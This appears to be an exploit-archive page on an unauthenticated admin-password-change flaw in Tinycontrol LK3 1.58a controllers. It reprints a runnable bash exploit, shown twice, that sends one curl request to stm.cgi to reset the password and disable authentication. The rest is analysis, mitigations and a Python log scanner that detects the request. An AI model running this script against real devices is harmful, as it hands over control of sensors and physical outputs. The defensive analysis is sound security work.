Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: Remote Language: Shell Published Date: 2023-10-09
#!/bin/bash
: "
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Exploit Author: LiquidWorm

Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8

Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observe
the results on a server, and to cooperate
with other I/O systems based on TCP/IP and Modbus.

Desc: The application suffers from an insecure access
control allowing an unauthenticated attacker to
change accounts passwords and bypass authentication
gaining panel control access.

Tested on: lwIP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2023-5787
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php


18.08.2023

"

set -euo pipefail
IFS=$'\n\t'

if [ $# -ne 2 ]; then
    # double quotes so $0 expands to the script name (single quotes printed it literally)
    echo -ne "\nUsage: $0 [ipaddr] [desired admin pwd]\n\n"
    exit 1
fi

IP=$1
PW=$2

# base64-encode the new password; tr strips the line wrap GNU base64 adds for long input
EN=$(printf '%s' "$PW" | base64 | tr -d '\n')

# URL quoted: '?' and '*' are glob characters and could otherwise be expanded by the shell
# Layout of auth=: two flag digits, then base64 fields separated by '*':
#   admin login * admin password * user login * user password
curl -s "http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg=="
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
echo -e "\nAdmin password changed to: $PW"


Exploiting Insecure Access Control in Tinycontrol LAN Controller v3 (LK3) 1.58a

The Tinycontrol LAN Controller v3 (LK3) firmware 1.58a, an IoT controller for reading sensors and switching outputs, has a critical flaw that lets an unauthenticated attacker set the admin password remotely. The issue, reported by security researcher Gjoko "LiquidWorm" Krstic, is not a misconfiguration but an access-control defect in the device's web API: the endpoint that sets account credentials and the authentication switch does not require the caller to be logged in.

Understanding the Vulnerability

The core issue lies in the device's web API endpoint stm.cgi and its auth parameter, which sets the device's access configuration in one value. The two leading digits are flags for authentication and firmware upgrade (00 disables both, per the exploit's own comment and the vendor API page it links, https://docs.tinycontrol.pl/en/lk3/api/access/), followed by the account credentials as base64 fields separated by `*`. This is a legitimate configuration call, but the device applies it without checking that the requester is authenticated.

Attackers exploit this with a single crafted HTTP GET whose auth value contains:

  • 00 — the flag digits: the first 0 disables authentication, the second disables upgrade
  • YWRtaW4= — base64 of admin, the account whose password is being set
  • the base64-encoded new password
  • dXNlcg==*dXNlcg== — base64 of user, twice, filling the remaining credential fields so the value has the layout the endpoint expects (the page treats these as placeholders; the linked API documentation defines their exact role)

As a result, anyone who can reach the device's web interface can set the admin password with one unauthenticated request, with no prior credentials. Because the same request switches authentication off, the attacker does not even need to log in afterwards to use the panel.

Exploit Code Analysis

#!/bin/bash
: "
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Exploit Author: LiquidWorm
"
set -euo pipefail
IFS=$'\n\t'

if [ $# -ne 2 ]; then
 # double quotes so $0 expands to the script name
 echo -ne "\nUsage: $0 [ipaddr] [desired admin pwd]\n\n"
 exit 1
fi

IP=$1
PW=$2

# base64-encode the new password (tr removes the line wrap GNU base64 adds for long input)
EN=$(printf '%s' "$PW" | base64 | tr -d '\n')

# URL quoted so the shell cannot glob-expand '?' and '*'
curl -s "http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg=="
echo -e "\nAdmin password changed to: $PW"

This bash script is the whole attack: one unauthenticated GET. Breaking down the auth value:

  • 00: the two flag digits; the first 0 disables authentication, the second disables the upgrade function.
  • YWRtaW4=: base64 of admin, the account being changed.
  • $EN: the attacker-chosen password, base64-encoded.
  • dXNlcg== (twice): base64 of user, filling the remaining credential fields so the value keeps the format the endpoint expects.

Note what the exploit does not rely on: there is no malformed input, no injection, and nothing about the request is unusual. It is a well-formed use of the documented auth parameter. The defect is that stm.cgi applies it without verifying that the caller is logged in, so the request an administrator would send to set credentials works equally well for anyone on the network.

Real-World Impact and Attack Scenarios

Consider a scenario where an attacker discovers a Tinycontrol device on a corporate network via a simple network scan. Using the exploit script, they can:

  • Change the admin password to a value of their choosing, such as admin123 or root.
  • Gain full control over sensor monitoring and output control.
  • Automate actions via event-based rules (e.g., trigger an output when a temperature threshold is crossed).
  • Leave authentication and the upgrade function switched off (both are disabled by the 00 flags in the request), so the device stays open until someone re-enables them.

Such control can be used to:

  • Create malicious event rules that switch outputs at times of the attacker's choosing.
  • Read sensitive environmental data (e.g., temperature readings from a server room).
  • Trigger unauthorized physical actions through the controlled outputs (e.g., opening doors or cutting power to equipment wired to them).

Security Implications and Vendor Response

The vulnerability affects firmware versions up to and including 1.58a on hardware version 3.8. It is documented in Zero Science Lab advisory ZSL-2023-5787, dated 18 August 2023, and was published on 9 October 2023.

The advisory does not identify a fixed firmware release. Embedded controllers of this kind commonly run the firmware they shipped with for years, so any deployment on 1.58a or earlier, industrial or residential, should be assumed exploitable by anyone who can reach its web interface.

Best Practices for Mitigation

For system administrators and security teams, the following measures are recommended:

  • Network segmentation: isolate Tinycontrol devices behind firewalls or in a dedicated VLAN, reachable only from the hosts that legitimately manage them.
  • Disable external access: ensure the device's web interface, and stm.cgi in particular, is not exposed to the internet.
  • Update firmware: move to a release newer than 1.58a as soon as the vendor publishes one.
  • Monitor API usage: log requests to stm.cgi at a reverse proxy, span port or firewall in front of the device, and alert on any auth= value whose leading flag digits disable authentication.
  • Use strong passwords: avoid default credentials and enforce a password policy, but note that password strength does not mitigate this flaw, since the exploit overwrites the password without ever knowing it. Rotate credentials after any suspected exposure.
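The following is an added example, not code from the original advisory or from Tinycontrol: a small Python scanner that implements the "Monitor API usage" item above and, along the way, decodes the auth= layout described in the Exploit Code Analysis section. It reads access-log lines in combined log format (as a reverse proxy in front of the controller would write them), picks out every stm.cgi?auth= request, splits the value into its flag digits and base64 fields, and marks requests that turn authentication off as critical. The log lines are constructed for this example; the flag interpretation (0 = disabled, taken from the exploit's comment; 1 = enabled is an assumption) and the field order are taken from the exploit on this page.

```python
import base64
import binascii
import re
from dataclasses import dataclass
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format, as written by a
# reverse proxy or rendered from a packet capture). Hypothetical, not real
# controller logs. Line 2 is this page's exploit with the new password
# "password"; line 3 is the same endpoint used legitimately, with
# authentication and upgrade left enabled.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Aug/2023:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 1324 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Aug/2023:10:02:44 +0000] "GET /stm.cgi?auth=00YWRtaW4=*cGFzc3dvcmQ=*dXNlcg==*dXNlcg== HTTP/1.1" 200 12 "-" "curl/8.1.2"
10.0.0.5 - - [18/Aug/2023:10:03:01 +0000] "GET /stm.cgi?auth=11YWRtaW4=*U3Ryb25nUHc=*dXNlcg==*dXNlcg== HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.0.7 - - [18/Aug/2023:10:04:30 +0000] "GET /sensors.xml HTTP/1.1" 200 980 "-" "python-requests/2.31"
"""

# Combined log format: client, ident, user, [timestamp], "METHOD target HTTP/x.y"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# The query is taken raw rather than via parse_qs: base64 may contain '+',
# which parse_qs would turn into a space.
AUTH_RE = re.compile(r'^/stm\.cgi\?(?:.*&)?auth=(?P<auth>[^&\s]*)')


@dataclass
class AuthChange:
    src: str
    ts: str
    auth_enabled: bool
    upgrade_enabled: bool
    fields: list  # decoded credential fields in the order they were sent

    @property
    def critical(self) -> bool:
        # Turning authentication off is the exploit's signature. Any credential
        # change from an unexpected source still deserves a look, but this one
        # should page someone.
        return not self.auth_enabled


def _b64_field(raw: str) -> str:
    # Keep an undecodable token visible instead of dropping the event.
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return f"<undecodable:{raw}>"


def parse_auth_param(value: str) -> tuple:
    """Split an stm.cgi auth= value into (auth_enabled, upgrade_enabled, fields).

    Layout as used by the exploit on this page: two flag digits, then base64
    fields separated by '*' (admin login, admin password, user login, user
    password). '0' = disabled comes from the exploit's comment; that '1'
    means enabled is an assumption of this example.
    """
    value = unquote(value)
    if len(value) < 2 or not value[:2].isdigit():
        raise ValueError(f"unexpected auth value: {value!r}")
    auth_enabled = value[0] != "0"
    upgrade_enabled = value[1] != "0"
    fields = [_b64_field(f) for f in value[2:].split("*")] if value[2:] else []
    return auth_enabled, upgrade_enabled, fields


def scan_log(text: str) -> list:
    """Return one AuthChange per stm.cgi?auth= request found in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        a = AUTH_RE.match(m["target"])
        if not a:
            continue
        auth_on, upg_on, fields = parse_auth_param(a["auth"])
        hits.append(AuthChange(m["src"], m["ts"], auth_on, upg_on, fields))
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        level = "CRITICAL" if hit.critical else "NOTICE"
        account = hit.fields[0] if hit.fields else "?"
        print(f"{level} {hit.ts} {hit.src} auth={'on' if hit.auth_enabled else 'OFF'} "
              f"upgrade={'on' if hit.upgrade_enabled else 'OFF'} account={account}")
```

Run it against the constructed log and the exploit request from 10.0.0.9 is reported as CRITICAL with authentication and upgrade both off and the admin account named, while the legitimate 11 request from 10.0.0.5 is reported as NOTICE. In production the same parse_auth_param can sit behind any log pipeline; the decision to alert on every stm.cgi?auth= call, not only the 00 ones, depends on how often administrators legitimately use the endpoint on your network.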

Why This Vulnerability Matters

IoT devices like the Tinycontrol LK3 are often treated as low-risk because of their limited user interface. This exploit shows that even a simple device becomes a high-value target when its configuration API is reachable without authentication.

It underscores a broader pattern in embedded web interfaces: a feature-rich API whose endpoints do not check who is calling them turns a convenience feature into an unauthenticated remote takeover. This is not an isolated case; the same pattern keeps reappearing in other embedded devices with web management interfaces.

Conclusion

The Tinycontrol LAN Controller v3 (LK3) 1.58a vulnerability is a reminder that security must be applied at every layer, even in seemingly benign systems. Developers and administrators alike must treat configuration endpoints with the same rigor as login forms, above all when those endpoints can change passwords or switch authentication off.

As attacks increasingly target IoT infrastructure, proactive defense (network monitoring, firmware updates and secure configuration) is no longer optional; it is essential.